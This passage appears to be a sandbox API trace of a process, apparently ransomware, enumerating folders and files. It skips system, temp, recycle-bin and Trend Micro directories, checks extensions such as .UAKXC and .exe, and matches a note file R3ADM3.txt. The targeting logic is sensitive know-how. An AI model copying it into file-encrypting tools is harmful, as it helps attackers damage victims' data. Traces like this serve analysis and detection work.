StrStrIW (lpFirst="Help", lpSrch="Boot") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="Windows") returned 0x0 [0160.701] StrStrIW (lpFirst="Help", lpSrch="Trend Micro") returned 0x0 [0160.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.701] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.701] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795390 [0160.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd4c0 [0160.701] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.701] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0160.701] lstrcmpW (lpString1="ink", lpString2=".") returned 1 [0160.701] lstrcmpW (lpString1="ink", lpString2="..") returned 1 [0160.701] StrStrIW (lpFirst="ink", lpSrch="tmp") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="winnt") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="temp") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="thumb") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="$Recycle.Bin") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="System Volume Information") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="Boot") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="Windows") returned 0x0 [0160.702] StrStrIW (lpFirst="ink", lpSrch="Trend Micro") returned 0x0 [0160.702] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.702] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.702] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.702] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.702] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.702] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77953b8 [0160.702] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede538 [0160.702] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.702] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSEnv", cAlternateFileName="")) returned 1 [0160.702] lstrcmpW (lpString1="MSEnv", lpString2=".") returned 1 [0160.702] lstrcmpW (lpString1="MSEnv", lpString2="..") returned 1 [0160.702] StrStrIW (lpFirst="MSEnv", lpSrch="tmp") returned 0x0 [0160.702] StrStrIW (lpFirst="MSEnv", lpSrch="winnt") returned 0x0 [0160.702] StrStrIW (lpFirst="MSEnv", lpSrch="temp") returned 0x0 [0160.702] StrStrIW (lpFirst="MSEnv", lpSrch="thumb") returned 0x0 [0160.702] StrStrIW (lpFirst="MSEnv", lpSrch="$Recycle.Bin") returned 0x0 [0160.703] StrStrIW (lpFirst="MSEnv", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.703] StrStrIW (lpFirst="MSEnv", lpSrch="System Volume Information") returned 0x0 [0160.703] StrStrIW (lpFirst="MSEnv", lpSrch="Boot") returned 0x0 [0160.703] StrStrIW (lpFirst="MSEnv", lpSrch="Windows") returned 0x0 [0160.703] StrStrIW (lpFirst="MSEnv", lpSrch="Trend Micro") returned 0x0 [0160.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.703] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.703] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77953e0 [0160.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede5c0 [0160.703] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.703] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0160.703] lstrcmpW (lpString1="MSInfo", lpString2=".") returned 1 [0160.703] lstrcmpW (lpString1="MSInfo", lpString2="..") returned 1 [0160.703] StrStrIW (lpFirst="MSInfo", lpSrch="tmp") returned 0x0 [0160.703] StrStrIW (lpFirst="MSInfo", lpSrch="winnt") returned 0x0 [0160.703] StrStrIW (lpFirst="MSInfo", lpSrch="temp") returned 0x0 [0160.703] StrStrIW (lpFirst="MSInfo", lpSrch="thumb") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="$Recycle.Bin") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="System Volume Information") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="Boot") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="Windows") returned 0x0 [0160.704] StrStrIW (lpFirst="MSInfo", lpSrch="Trend Micro") returned 0x0 [0160.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.704] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.704] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795408 [0160.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede648 [0160.704] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.704] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7a735b0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xb30acfc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb30acfc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0160.704] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0160.704] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="tmp") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="winnt") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="temp") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="thumb") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="$Recycle.Bin") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="System Volume Information") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="Boot") returned 0x0 [0160.704] StrStrIW (lpFirst="OFFICE14", lpSrch="Windows") returned 0x0 [0160.705] StrStrIW (lpFirst="OFFICE14", lpSrch="Trend Micro") returned 0x0 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795430 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.705] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.705] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.705] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795430 | out: hHeap=0xea0000) returned 1 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795430 [0160.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede6d0 [0160.705] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.705] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xadf4bfa0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Portal", cAlternateFileName="")) returned 1 [0160.705] lstrcmpW (lpString1="Portal", lpString2=".") returned 1 [0160.705] lstrcmpW (lpString1="Portal", lpString2="..") returned 1 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="tmp") returned 0x0 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="winnt") returned 0x0 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="temp") returned 0x0 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="thumb") returned 0x0 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="$Recycle.Bin") returned 0x0 [0160.705] StrStrIW (lpFirst="Portal", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.706] StrStrIW (lpFirst="Portal", lpSrch="System Volume Information") returned 0x0 [0160.706] StrStrIW (lpFirst="Portal", lpSrch="Boot") returned 0x0 [0160.706] StrStrIW (lpFirst="Portal", lpSrch="Windows") returned 0x0 [0160.706] StrStrIW (lpFirst="Portal", lpSrch="Trend Micro") returned 0x0 [0160.706] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.706] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.706] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.706] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.706] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.706] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795458 [0160.706] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede758 [0160.706] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.706] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x649fa250, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x649fa250, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x649fa250, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.706] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.706] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.706] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.706] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.706] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.706] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.707] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8132bc53, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8132bc53, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0160.707] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0160.707] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="tmp") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="winnt") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="temp") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="thumb") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="$Recycle.Bin") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="System Volume Information") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="Boot") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="Windows") returned 0x0 [0160.707] StrStrIW (lpFirst="Stationery", lpSrch="Trend Micro") returned 0x0 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795480 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.707] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.707] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.707] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795480 | out: hHeap=0xea0000) returned 1 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795480 [0160.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede7e0 [0160.707] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.708] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd6e32460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6e32460, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0160.708] lstrcmpW (lpString1="TextConv", lpString2=".") returned 1 [0160.708] lstrcmpW (lpString1="TextConv", lpString2="..") returned 1 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="tmp") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="winnt") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="temp") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="thumb") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="$Recycle.Bin") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="System Volume Information") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="Boot") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="Windows") returned 0x0 [0160.708] StrStrIW (lpFirst="TextConv", lpSrch="Trend Micro") returned 0x0 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77954a8 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.708] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.708] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77967f0 | out: hHeap=0xea0000) returned 1 [0160.708] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77954a8 | out: hHeap=0xea0000) returned 1 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77954a8 [0160.708] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede868 [0160.708] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.708] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0160.708] lstrcmpW (lpString1="Triedit", lpString2=".") returned 1 [0160.708] lstrcmpW (lpString1="Triedit", lpString2="..") returned 1 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="tmp") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="winnt") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="temp") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="thumb") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="$Recycle.Bin") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="System Volume Information") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="Boot") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="Windows") returned 0x0 [0160.709] StrStrIW (lpFirst="Triedit", lpSrch="Trend Micro") returned 0x0 [0160.709] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.709] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.709] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.709] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77968e0 | out: hHeap=0xea0000) returned 1 [0160.709] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec355540, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0160.709] lstrcmpW (lpString1="VBA", lpString2=".") returned 1 [0160.709] lstrcmpW (lpString1="VBA", lpString2="..") returned 1 [0160.709] StrStrIW (lpFirst="VBA", lpSrch="tmp") returned 0x0 [0160.709] StrStrIW (lpFirst="VBA", lpSrch="winnt") returned 0x0 [0160.709] StrStrIW (lpFirst="VBA", lpSrch="temp") returned 0x0 [0160.709] StrStrIW (lpFirst="VBA", lpSrch="thumb") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="$Recycle.Bin") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="System Volume Information") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="Boot") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="Windows") returned 0x0 [0160.710] StrStrIW (lpFirst="VBA", lpSrch="Trend Micro") returned 0x0 [0160.710] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.710] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.710] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.710] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f61b1a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xcc379b80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xcc379b80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0160.710] lstrcmpW (lpString1="VC", lpString2=".") returned 1 [0160.710] lstrcmpW (lpString1="VC", lpString2="..") returned 1 [0160.710] StrStrIW (lpFirst="VC", lpSrch="tmp") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="winnt") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="temp") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="thumb") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="$Recycle.Bin") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="System Volume Information") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="Boot") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="Windows") returned 0x0 [0160.710] StrStrIW (lpFirst="VC", lpSrch="Trend Micro") returned 0x0 [0160.710] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77967f0 [0160.710] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.711] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81305af3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81305af3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0160.711] lstrcmpW (lpString1="VGX", lpString2=".") returned 1 [0160.711] lstrcmpW (lpString1="VGX", lpString2="..") returned 1 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="tmp") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="winnt") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="temp") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="thumb") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="$Recycle.Bin") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="System Volume Information") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="Boot") returned 0x0 [0160.711] StrStrIW (lpFirst="VGX", lpSrch="Windows") returned 0x0 [0160.794] StrStrIW (lpFirst="VGX", lpSrch="Trend Micro") returned 0x0 [0160.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77968e0 [0160.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796958 [0160.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.795] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f4696f0, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSTA", cAlternateFileName="")) returned 1 [0160.795] lstrcmpW (lpString1="VSTA", lpString2=".") returned 1 [0160.795] 